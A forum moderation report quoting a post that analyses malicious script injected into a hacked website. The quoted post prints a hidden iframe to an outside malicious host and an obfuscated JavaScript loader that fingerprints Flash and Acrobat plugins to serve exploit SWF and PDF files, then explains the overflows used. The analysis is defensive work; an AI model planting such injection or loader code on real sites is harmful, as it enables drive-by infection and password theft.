Reported Post by h@ck3r

h@ck3r

New Member
h@ck3r has reported a post.

Reason:
Although this post is not a bad post- I just find it strange that the exact same post has been made here after I've reported this virus, as when i reported it on another forum I use daily. Check this thread: http://forum.gsmhosting.com/vbb/showthread.php?p=4446802

EXACT same content in his post, 1 post member only, and VERY similar username.

Any way someones added script to something on here, and they are able to follow us around seeing what we're posting online etc?

Would very much appreciate a pm with some form of response please.

Thanks for your time :)
Post: Someone hacked my website!
Forum: Programming
Assigned Moderators: Daz, SpeedRazors

Posted by: nagger
Original Content:
I looked into this a little bit.

That javascript blabla comes out to:

Code:
<iframe width="480" height="60" src="http://profi-tooltip.biz/blog/feed.html" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>

It opens an iframe to that dodgey site which then runs the script that contains 2 infected exploits, one being a .swf file and one being an .pdf

Code:
<script>
function mjnhyua() { return 'ra'+'m'; }
for(i=0;navigator.plugins[i];i++){
		regexp=new RegExp('.ho.+?wave.+?([0-9]+).+?([0-9]+).+?([0-9]+)');
var ertdfg = "dfgdfgdfgdf43565gkui";
		result=regexp.exec(navigator.plugins[i]['description']);
ertdfg = "dfgdfgdfgdf43565gkui";
		if(result!=null && result[1]==9 && result[2]==0 && result[3]<124) {
ertdfg = "dfgdfgdfgdf43565gkui";
			document.write('<if'+mjnhyua()+'e src="fmocs.swf"></if'+mjnhyua()+'e>');
ertdfg = "dfgdfgdfgdf43565gkui";
			break;
		}
}
for(i=0;navigator.plugins[i];i++){
		name=navigator.plugins[i].name;
		if(name.indexOf('Adobe Acrobat')!=-1){
			document.write('<if'+mjnhyua()+'e src="fnocs.pdf"></if'+mjnhyua()+'e>');
			break;
		}
}
</script>

File: fmocs.swf Status: INFECTED/MALWARE MD5: 04edba09fc62d7f8ed56a346491a3125
Specifically crafted SWF(flash files) files allow remote file execution when the client has a vulnerable FlashPlayer.A malformed SWF record's value triggers a buffer overflow. The size of the SWF files vary. Usually it's a download and execute shellcode used to download and run a PasswordStealer trojan. It seems that all versions of flashplayer up to 9.0.124.0 are vulnerable ( though we saw malicious pages trying to exploit only version 115 and 47).

Other file the pdf is This is a generic detection for specially crafted PDF files which exploit different vulnerabilities found in Adobe PDF Reader's Javascript engine in order to execute malicious code on user's computer. The exploitation mainly involves the following two functions:
util.printf() - if an attacker sends a string long enough to generate a
stack-based buffer overflow he will then be able to
execute arbitrary code on user's computer with the
same level privileges as the user who opened the PDF
file
Collab.colectEmailInfo() - a stack-based buffer overflow can be
caused by passing a string long enough (at least 44952
characters) as a parameter in the msg field of this
function.

The Javascript function containing the actual exploit is specified in the OpenAction tag of the PDF file. Usually this function is encoded using zlib. After decompression sometimes the script is still obscured through one or more layers of encoding in order to avoid detection and make analysis more difficult.
The javascript code inside the PDF file is used to download and execute other malware on user's computer.


I can conclude that the following people are vurnable to this exploit:
people using FlashPlayer 9.0.124.0 and below, or adobe acrobat reader before 8.1.2
 
Top